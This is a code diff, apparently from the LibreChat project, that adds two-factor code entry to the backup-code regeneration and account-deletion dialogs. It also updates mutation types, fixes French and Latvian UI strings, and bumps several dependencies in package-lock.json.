setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser); setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser);
setOtpToken('');
showToast({ showToast({
message: localize('com_ui_backup_codes_regenerated'), message: localize('com_ui_backup_codes_regenerated'),
status: 'success', status: 'success',
}); });
// Trigger file download only when user explicitly clicks the button.
if (!auto && newBackupCodes.length) { if (!auto && newBackupCodes.length) {
const codesString = data.backupCodes.join('\n'); const codesString = data.backupCodes.join('\n');
const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' }); const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' });
@ -66,6 +81,8 @@ const BackupCodesItem: React.FC = () => {
fetchBackupCodes(false); fetchBackupCodes(false);
}; };
const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6);
return ( return (
<OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}> <OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}>
<div className="flex items-center justify-between"> <div className="flex items-center justify-between">
@ -161,10 +178,10 @@ const BackupCodesItem: React.FC = () => {
); );
})} })}
</div> </div>
<div className="mt-12 flex justify-center"> <div className="mt-6 flex justify-center">
<Button <Button
onClick={handleRegenerate} onClick={handleRegenerate}
disabled={isLoading} disabled={isLoading || !otpReady}
variant="default" variant="default"
className="px-8 py-3 transition-all disabled:opacity-50" className="px-8 py-3 transition-all disabled:opacity-50"
> >
@ -183,7 +200,7 @@ const BackupCodesItem: React.FC = () => {
<div className="flex flex-col items-center gap-4 p-6 text-center"> <div className="flex flex-col items-center gap-4 p-6 text-center">
<Button <Button
onClick={handleRegenerate} onClick={handleRegenerate}
disabled={isLoading} disabled={isLoading || !otpReady}
variant="default" variant="default"
className="px-8 py-3 transition-all disabled:opacity-50" className="px-8 py-3 transition-all disabled:opacity-50"
> >
@ -192,6 +209,59 @@ const BackupCodesItem: React.FC = () => {
</Button> </Button>
</div> </div>
)} )}
{needs2FA && (
<div className="mt-6 space-y-3">
<Label className="text-sm font-medium">
{localize('com_ui_2fa_verification_required')}
</Label>
<div className="flex justify-center">
<InputOTP
value={otpToken}
onChange={setOtpToken}
maxLength={useBackup ? 8 : 6}
pattern={useBackup ? REGEXP_ONLY_DIGITS_AND_CHARS : REGEXP_ONLY_DIGITS}
className="gap-2"
>
{useBackup ? (
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
<InputOTPSlot index={6} />
<InputOTPSlot index={7} />
</InputOTPGroup>
) : (
<>
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
</InputOTPGroup>
<InputOTPSeparator />
<InputOTPGroup>
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
</InputOTPGroup>
</>
)}
</InputOTP>
</div>
<button
type="button"
onClick={() => {
setUseBackup(!useBackup);
setOtpToken('');
}}
className="text-sm text-primary hover:underline"
>
{useBackup ? localize('com_ui_use_2fa_code') : localize('com_ui_use_backup_code')}
</button>
</div>
)}
</motion.div> </motion.div>
</AnimatePresence> </AnimatePresence>
</OGDialogContent> </OGDialogContent>

View file

@ -1,16 +1,22 @@
import { LockIcon, Trash } from 'lucide-react';
import React, { useState, useCallback } from 'react'; import React, { useState, useCallback } from 'react';
import { LockIcon, Trash } from 'lucide-react';
import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp';
import { import {
Label, InputOTPSeparator,
Input,
Button,
Spinner,
OGDialog,
OGDialogContent, OGDialogContent,
OGDialogTrigger, OGDialogTrigger,
OGDialogHeader, OGDialogHeader,
InputOTPGroup,
OGDialogTitle, OGDialogTitle,
InputOTPSlot,
OGDialog,
InputOTP,
Spinner,
Button,
Label,
Input,
} from '@librechat/client'; } from '@librechat/client';
import type { TDeleteUserRequest } from 'librechat-data-provider';
import { useDeleteUserMutation } from '~/data-provider'; import { useDeleteUserMutation } from '~/data-provider';
import { useAuthContext } from '~/hooks/AuthContext'; import { useAuthContext } from '~/hooks/AuthContext';
import { LocalizeFunction } from '~/common'; import { LocalizeFunction } from '~/common';
@ -21,16 +27,27 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
const localize = useLocalize(); const localize = useLocalize();
const { user, logout } = useAuthContext(); const { user, logout } = useAuthContext();
const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({ const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({
onMutate: () => logout(), onSuccess: () => logout(),
}); });
const [isDialogOpen, setDialogOpen] = useState<boolean>(false); const [isDialogOpen, setDialogOpen] = useState<boolean>(false);
const [isLocked, setIsLocked] = useState(true); const [isLocked, setIsLocked] = useState(true);
const [otpToken, setOtpToken] = useState('');
const [useBackup, setUseBackup] = useState(false);
const needs2FA = !!user?.twoFactorEnabled;
const handleDeleteUser = () => { const handleDeleteUser = () => {
if (!isLocked) { if (isLocked) {
deleteUser(undefined); return;
} }
let payload: TDeleteUserRequest | undefined;
if (needs2FA && otpToken.trim()) {
payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() };
}
deleteUser(payload);
}; };
const handleInputChange = useCallback( const handleInputChange = useCallback(
@ -42,6 +59,8 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
[user?.email], [user?.email],
); );
const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6);
return ( return (
<> <>
<OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}> <OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}>
@ -79,7 +98,60 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
(e) => handleInputChange(e.target.value), (e) => handleInputChange(e.target.value),
)} )}
</div> </div>
{renderDeleteButton(handleDeleteUser, isDeleting, isLocked, localize)} {needs2FA && (
<div className="mb-4 space-y-3">
<Label className="text-sm font-medium">
{localize('com_ui_2fa_verification_required')}
</Label>
<div className="flex justify-center">
<InputOTP
value={otpToken}
onChange={setOtpToken}
maxLength={useBackup ? 8 : 6}
pattern={useBackup ? REGEXP_ONLY_DIGITS_AND_CHARS : REGEXP_ONLY_DIGITS}
className="gap-2"
>
{useBackup ? (
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
<InputOTPSlot index={6} />
<InputOTPSlot index={7} />
</InputOTPGroup>
) : (
<>
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
</InputOTPGroup>
<InputOTPSeparator />
<InputOTPGroup>
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
</InputOTPGroup>
</>
)}
</InputOTP>
</div>
<button
type="button"
onClick={() => {
setUseBackup(!useBackup);
setOtpToken('');
}}
className="text-sm text-primary hover:underline"
>
{useBackup ? localize('com_ui_use_2fa_code') : localize('com_ui_use_backup_code')}
</button>
</div>
)}
{renderDeleteButton(handleDeleteUser, isDeleting, isLocked || !otpReady, localize)}
</div> </div>
</OGDialogContent> </OGDialogContent>
</OGDialog> </OGDialog>

View file

@ -68,14 +68,14 @@ export const useRefreshTokenMutation = (
/* User */ /* User */
export const useDeleteUserMutation = ( export const useDeleteUserMutation = (
options?: t.MutationOptions<unknown, undefined>, options?: t.MutationOptions<unknown, t.TDeleteUserRequest | undefined>,
): UseMutationResult<unknown, unknown, undefined, unknown> => { ): UseMutationResult<unknown, unknown, t.TDeleteUserRequest | undefined, unknown> => {
const queryClient = useQueryClient(); const queryClient = useQueryClient();
const clearStates = useClearStates(); const clearStates = useClearStates();
const resetDefaultPreset = useResetRecoilState(store.defaultPreset); const resetDefaultPreset = useResetRecoilState(store.defaultPreset);
return useMutation([MutationKeys.deleteUser], { return useMutation([MutationKeys.deleteUser], {
mutationFn: () => dataService.deleteUser(), mutationFn: (payload?: t.TDeleteUserRequest) => dataService.deleteUser(payload),
...(options || {}), ...(options || {}),
onSuccess: (...args) => { onSuccess: (...args) => {
resetDefaultPreset(); resetDefaultPreset();
@ -90,11 +90,11 @@ export const useDeleteUserMutation = (
export const useEnableTwoFactorMutation = (): UseMutationResult< export const useEnableTwoFactorMutation = (): UseMutationResult<
t.TEnable2FAResponse, t.TEnable2FAResponse,
unknown, unknown,
void, t.TEnable2FARequest | undefined,
unknown unknown
> => { > => {
const queryClient = useQueryClient(); const queryClient = useQueryClient();
return useMutation(() => dataService.enableTwoFactor(), { return useMutation((payload?: t.TEnable2FARequest) => dataService.enableTwoFactor(payload), {
onSuccess: (data) => { onSuccess: (data) => {
queryClient.setQueryData([QueryKeys.user, '2fa'], data); queryClient.setQueryData([QueryKeys.user, '2fa'], data);
}, },
@ -146,15 +146,18 @@ export const useDisableTwoFactorMutation = (): UseMutationResult<
export const useRegenerateBackupCodesMutation = (): UseMutationResult< export const useRegenerateBackupCodesMutation = (): UseMutationResult<
t.TRegenerateBackupCodesResponse, t.TRegenerateBackupCodesResponse,
unknown, unknown,
void, t.TRegenerateBackupCodesRequest | undefined,
unknown unknown
> => { > => {
const queryClient = useQueryClient(); const queryClient = useQueryClient();
return useMutation(() => dataService.regenerateBackupCodes(), { return useMutation(
(payload?: t.TRegenerateBackupCodesRequest) => dataService.regenerateBackupCodes(payload),
{
onSuccess: (data) => { onSuccess: (data) => {
queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data); queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data);
}, },
}); },
);
}; };
export const useVerifyTwoFactorTempMutation = ( export const useVerifyTwoFactorTempMutation = (

View file

@ -639,6 +639,7 @@
"com_ui_2fa_generate_error": "There was an error generating two-factor authentication settings", "com_ui_2fa_generate_error": "There was an error generating two-factor authentication settings",
"com_ui_2fa_invalid": "Invalid two-factor authentication code", "com_ui_2fa_invalid": "Invalid two-factor authentication code",
"com_ui_2fa_setup": "Setup 2FA", "com_ui_2fa_setup": "Setup 2FA",
"com_ui_2fa_verification_required": "Enter your 2FA code to continue",
"com_ui_2fa_verified": "Successfully verified Two-Factor Authentication", "com_ui_2fa_verified": "Successfully verified Two-Factor Authentication",
"com_ui_accept": "I accept", "com_ui_accept": "I accept",
"com_ui_action_button": "Action Button", "com_ui_action_button": "Action Button",

View file

@ -1203,7 +1203,7 @@
"com_ui_upload_image_input": "Téléverser une image", "com_ui_upload_image_input": "Téléverser une image",
"com_ui_upload_invalid": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser la limite", "com_ui_upload_invalid": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser la limite",
"com_ui_upload_invalid_var": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser {{0}} Mo", "com_ui_upload_invalid_var": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser {{0}} Mo",
"com_ui_upload_ocr_text": "Téléchager en tant que texte", "com_ui_upload_ocr_text": "Télécharger en tant que texte",
"com_ui_upload_provider": "Télécharger vers le fournisseur", "com_ui_upload_provider": "Télécharger vers le fournisseur",
"com_ui_upload_success": "Fichier téléversé avec succès", "com_ui_upload_success": "Fichier téléversé avec succès",
"com_ui_upload_type": "Sélectionner le type de téléversement", "com_ui_upload_type": "Sélectionner le type de téléversement",

View file

@ -39,7 +39,7 @@
"com_agents_description_card": "Apraksts: {{description}}", "com_agents_description_card": "Apraksts: {{description}}",
"com_agents_description_placeholder": "Pēc izvēles: aprakstiet savu aģentu šeit", "com_agents_description_placeholder": "Pēc izvēles: aprakstiet savu aģentu šeit",
"com_agents_empty_state_heading": "Nav atrasts neviens aģents", "com_agents_empty_state_heading": "Nav atrasts neviens aģents",
"com_agents_enable_file_search": "Iespējot vektorizēto meklēšanu", "com_agents_enable_file_search": "Iespējot meklēšanu dokumentos",
"com_agents_error_bad_request_message": "Pieprasījumu nevarēja apstrādāt.", "com_agents_error_bad_request_message": "Pieprasījumu nevarēja apstrādāt.",
"com_agents_error_bad_request_suggestion": "Lūdzu, pārbaudiet ievadītos datus un mēģiniet vēlreiz.", "com_agents_error_bad_request_suggestion": "Lūdzu, pārbaudiet ievadītos datus un mēģiniet vēlreiz.",
"com_agents_error_category_title": "Kategorija Kļūda", "com_agents_error_category_title": "Kategorija Kļūda",
@ -66,7 +66,7 @@
"com_agents_file_context_description": "Visi augšupielādētie faili tiek pilnībā pārveidoti tekstā un nekavējoties pievienoti aģenta pamata kontekstam kā nemainīgs saturs, kas pieejams visu sarunas laiku. Ja augšupielādētajam faila tipam ir pieejams vai konfigurēts OCR, teksta izvilkšana notiek automātiski. Šī metode ir piemērota gadījumos, kad nepieciešams analizēt visu dokumenta, attēla ar tekstu vai PDF faila saturu, taču jāņem vērā, ka tas ievērojami palielina atmiņas patēriņu un izmaksas.", "com_agents_file_context_description": "Visi augšupielādētie faili tiek pilnībā pārveidoti tekstā un nekavējoties pievienoti aģenta pamata kontekstam kā nemainīgs saturs, kas pieejams visu sarunas laiku. Ja augšupielādētajam faila tipam ir pieejams vai konfigurēts OCR, teksta izvilkšana notiek automātiski. Šī metode ir piemērota gadījumos, kad nepieciešams analizēt visu dokumenta, attēla ar tekstu vai PDF faila saturu, taču jāņem vērā, ka tas ievērojami palielina atmiņas patēriņu un izmaksas.",
"com_agents_file_context_disabled": "Pirms failu augšupielādes, lai to pievienotu kā kontekstu, ir jāizveido aģents.", "com_agents_file_context_disabled": "Pirms failu augšupielādes, lai to pievienotu kā kontekstu, ir jāizveido aģents.",
"com_agents_file_context_label": "Pievienot failu kā kontekstu", "com_agents_file_context_label": "Pievienot failu kā kontekstu",
"com_agents_file_search_disabled": "Lai varētu iespējot vektorizētu meklēšanu ir jāizveido aģents.", "com_agents_file_search_disabled": "Lai varētu iespējot meklēšanu dokumentos ir jāizveido aģents.",
"com_agents_file_search_info": "Kad šī opcija ir iespējota, aģents izmanto vektorizētu datu meklēšanu (RAG pieeju), kas ļauj efektīvi un izmaksu ziņā izdevīgi izgūt atbilstošu kontekstu tikai no būtiskākajām faila daļām, balstoties uz lietotāja jautājumu, nevis analizē visu failu pilnā apjomā.", "com_agents_file_search_info": "Kad šī opcija ir iespējota, aģents izmanto vektorizētu datu meklēšanu (RAG pieeju), kas ļauj efektīvi un izmaksu ziņā izdevīgi izgūt atbilstošu kontekstu tikai no būtiskākajām faila daļām, balstoties uz lietotāja jautājumu, nevis analizē visu failu pilnā apjomā.",
"com_agents_grid_announcement": "Rādu {{count}} aģentus {{category}} kategorijā", "com_agents_grid_announcement": "Rādu {{count}} aģentus {{category}} kategorijā",
"com_agents_instructions_placeholder": "Sistēmas instrukcijas, ko izmantos aģents", "com_agents_instructions_placeholder": "Sistēmas instrukcijas, ko izmantos aģents",
@ -126,7 +126,7 @@
"com_assistants_delete_actions_success": "Darbība veiksmīgi dzēsta no asistenta", "com_assistants_delete_actions_success": "Darbība veiksmīgi dzēsta no asistenta",
"com_assistants_description_placeholder": "Pēc izvēles: Šeit aprakstiet savu asistentu", "com_assistants_description_placeholder": "Pēc izvēles: Šeit aprakstiet savu asistentu",
"com_assistants_domain_info": "Asistents nosūtīja šo informāciju {{0}}", "com_assistants_domain_info": "Asistents nosūtīja šo informāciju {{0}}",
"com_assistants_file_search": "Vektorizētā Meklēšana (RAG)", "com_assistants_file_search": "Meklēšana dokumentos",
"com_assistants_file_search_info": "Šī funkcija ļauj asistentam izmantot augšupielādēto failu saturu, pievienojot zināšanas tieši no lietotāja vai citu lietotāju failiem. Pēc faila augšupielādes asistents automātiski identificē un izgūst nepieciešamās teksta daļas atbilstoši lietotāja pieprasījumam, neiekļaujot visu failu pilnā apjomā. Vektoru datubāzu (vector store) pieslēgšana tieši šai funkcijai šobrīd nav atbalstīta; tās iespējams pievienot tikai Provider Playground vidē vai augšupielādējot failus sarunas pavedienam ikreizējai meklēšanai.", "com_assistants_file_search_info": "Šī funkcija ļauj asistentam izmantot augšupielādēto failu saturu, pievienojot zināšanas tieši no lietotāja vai citu lietotāju failiem. Pēc faila augšupielādes asistents automātiski identificē un izgūst nepieciešamās teksta daļas atbilstoši lietotāja pieprasījumam, neiekļaujot visu failu pilnā apjomā. Vektoru datubāzu (vector store) pieslēgšana tieši šai funkcijai šobrīd nav atbalstīta; tās iespējams pievienot tikai Provider Playground vidē vai augšupielādējot failus sarunas pavedienam ikreizējai meklēšanai.",
"com_assistants_function_use": "Izmantotais asistents {{0}}", "com_assistants_function_use": "Izmantotais asistents {{0}}",
"com_assistants_image_vision": "Attēla redzējums", "com_assistants_image_vision": "Attēla redzējums",
@ -136,7 +136,7 @@
"com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.", "com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.",
"com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits", "com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits",
"com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums", "com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums",
"com_assistants_non_retrieval_model": "Šajā modelī vektorizētā meklēšana nav iespējota. Lūdzu, izvēlieties citu modeli.", "com_assistants_non_retrieval_model": "Šajā modelī meklēšana dokumentos nav iespējota. Lūdzu, izvēlieties citu modeli.",
"com_assistants_retrieval": "Atgūšana", "com_assistants_retrieval": "Atgūšana",
"com_assistants_running_action": "Darbība palaista", "com_assistants_running_action": "Darbība palaista",
"com_assistants_running_var": "Strādā {{0}}", "com_assistants_running_var": "Strādā {{0}}",
@ -232,7 +232,7 @@
"com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".", "com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".",
"com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).", "com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).",
"com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.", "com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.",
"com_endpoint_anthropic_use_web_search": "Iespējojiet tīmekļa meklēšanas funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.", "com_endpoint_anthropic_use_web_search": "Iespējojiet meklēšanu tīmeklī funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.",
"com_endpoint_assistant": "Asistents", "com_endpoint_assistant": "Asistents",
"com_endpoint_assistant_model": "Asistenta modelis", "com_endpoint_assistant_model": "Asistenta modelis",
"com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.", "com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.",
@ -1486,7 +1486,7 @@
"com_ui_version_var": "Versija {{0}}", "com_ui_version_var": "Versija {{0}}",
"com_ui_versions": "Versijas", "com_ui_versions": "Versijas",
"com_ui_view_memory": "Skatīt atmiņu", "com_ui_view_memory": "Skatīt atmiņu",
"com_ui_web_search": "Tīmekļa meklēšana", "com_ui_web_search": "Meklēšana tīmeklī",
"com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu", "com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu",
"com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)", "com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)",
"com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu", "com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu",

231
package-lock.json generated
View file

@ -66,6 +66,7 @@
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@node-saml/passport-saml": "^5.1.0", "@node-saml/passport-saml": "^5.1.0",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"bcryptjs": "^2.4.3", "bcryptjs": "^2.4.3",
"compression": "^1.8.1", "compression": "^1.8.1",
@ -81,7 +82,7 @@
"express-rate-limit": "^8.3.0", "express-rate-limit": "^8.3.0",
"express-session": "^1.18.2", "express-session": "^1.18.2",
"express-static-gzip": "^2.2.0", "express-static-gzip": "^2.2.0",
"file-type": "^18.7.0", "file-type": "^21.3.2",
"firebase": "^11.0.2", "firebase": "^11.0.2",
"form-data": "^4.0.4", "form-data": "^4.0.4",
"handlebars": "^4.7.7", "handlebars": "^4.7.7",
@ -121,10 +122,9 @@
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"sharp": "^0.33.5", "sharp": "^0.33.5",
"tiktoken": "^1.0.15",
"traverse": "^0.6.7", "traverse": "^0.6.7",
"ua-parser-js": "^1.0.36", "ua-parser-js": "^1.0.36",
"undici": "^7.18.2", "undici": "^7.24.1",
"winston": "^3.11.0", "winston": "^3.11.0",
"winston-daily-rotate-file": "^5.0.0", "winston-daily-rotate-file": "^5.0.0",
"xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz", "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",
@ -270,6 +270,24 @@
"node": ">= 0.8.0" "node": ">= 0.8.0"
} }
}, },
"api/node_modules/file-type": {
"version": "21.3.2",
"resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.2.tgz",
"integrity": "sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==",
"license": "MIT",
"dependencies": {
"@tokenizer/inflate": "^0.4.1",
"strtok3": "^10.3.4",
"token-types": "^6.1.1",
"uint8array-extras": "^1.4.0"
},
"engines": {
"node": ">=20"
},
"funding": {
"url": "https://github.com/sindresorhus/file-type?sponsor=1"
}
},
"api/node_modules/jose": { "api/node_modules/jose": {
"version": "6.1.3", "version": "6.1.3",
"resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz", "resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz",
@ -348,6 +366,40 @@
"@img/sharp-win32-x64": "0.33.5" "@img/sharp-win32-x64": "0.33.5"
} }
}, },
"api/node_modules/strtok3": {
"version": "10.3.4",
"resolved": "https://registry.npmjs.org/strtok3/-/strtok3-10.3.4.tgz",
"integrity": "sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==",
"license": "MIT",
"dependencies": {
"@tokenizer/token": "^0.3.0"
},
"engines": {
"node": ">=18"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"api/node_modules/token-types": {
"version": "6.1.2",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz",
"integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==",
"license": "MIT",
"dependencies": {
"@borewit/text-codec": "^0.2.1",
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"api/node_modules/winston-daily-rotate-file": { "api/node_modules/winston-daily-rotate-file": {
"version": "5.0.0", "version": "5.0.0",
"resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz", "resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz",
@ -7286,6 +7338,16 @@
"dev": true, "dev": true,
"license": "MIT" "license": "MIT"
}, },
"node_modules/@borewit/text-codec": {
"version": "0.2.2",
"resolved": "https://registry.npmjs.org/@borewit/text-codec/-/text-codec-0.2.2.tgz",
"integrity": "sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==",
"license": "MIT",
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@braintree/sanitize-url": { "node_modules/@braintree/sanitize-url": {
"version": "7.1.1", "version": "7.1.1",
"resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz", "resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz",
@ -20799,6 +20861,41 @@
"@testing-library/dom": ">=7.21.4" "@testing-library/dom": ">=7.21.4"
} }
}, },
"node_modules/@tokenizer/inflate": {
"version": "0.4.1",
"resolved": "https://registry.npmjs.org/@tokenizer/inflate/-/inflate-0.4.1.tgz",
"integrity": "sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==",
"license": "MIT",
"dependencies": {
"debug": "^4.4.3",
"token-types": "^6.1.1"
},
"engines": {
"node": ">=18"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@tokenizer/inflate/node_modules/token-types": {
"version": "6.1.2",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz",
"integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==",
"license": "MIT",
"dependencies": {
"@borewit/text-codec": "^0.2.1",
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@tokenizer/token": { "node_modules/@tokenizer/token": {
"version": "0.3.0", "version": "0.3.0",
"resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz", "resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz",
@ -22230,6 +22327,20 @@
"node": ">= 14" "node": ">= 14"
} }
}, },
"node_modules/ai-tokenizer": {
"version": "1.0.6",
"resolved": "https://registry.npmjs.org/ai-tokenizer/-/ai-tokenizer-1.0.6.tgz",
"integrity": "sha512-GaakQFxen0pRH/HIA4v68ZM40llCH27HUYUSBLK+gVuZ57e53pYJe1xFvSTj4sJJjbWU92m1X6NjPWyeWkFDow==",
"license": "MIT",
"peerDependencies": {
"ai": "^5.0.0"
},
"peerDependenciesMeta": {
"ai": {
"optional": true
}
}
},
"node_modules/ajv": { "node_modules/ajv": {
"version": "8.18.0", "version": "8.18.0",
"resolved": "https://registry.npmjs.org/ajv/-/ajv-8.18.0.tgz", "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.18.0.tgz",
@ -27499,22 +27610,6 @@
"moment": "^2.29.1" "moment": "^2.29.1"
} }
}, },
"node_modules/file-type": {
"version": "18.7.0",
"resolved": "https://registry.npmjs.org/file-type/-/file-type-18.7.0.tgz",
"integrity": "sha512-ihHtXRzXEziMrQ56VSgU7wkxh55iNchFkosu7Y9/S+tXHdKyrGjVK0ujbqNnsxzea+78MaLhN6PGmfYSAv1ACw==",
"dependencies": {
"readable-web-to-node-stream": "^3.0.2",
"strtok3": "^7.0.0",
"token-types": "^5.0.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"url": "https://github.com/sindresorhus/file-type?sponsor=1"
}
},
"node_modules/filelist": { "node_modules/filelist": {
"version": "1.0.6", "version": "1.0.6",
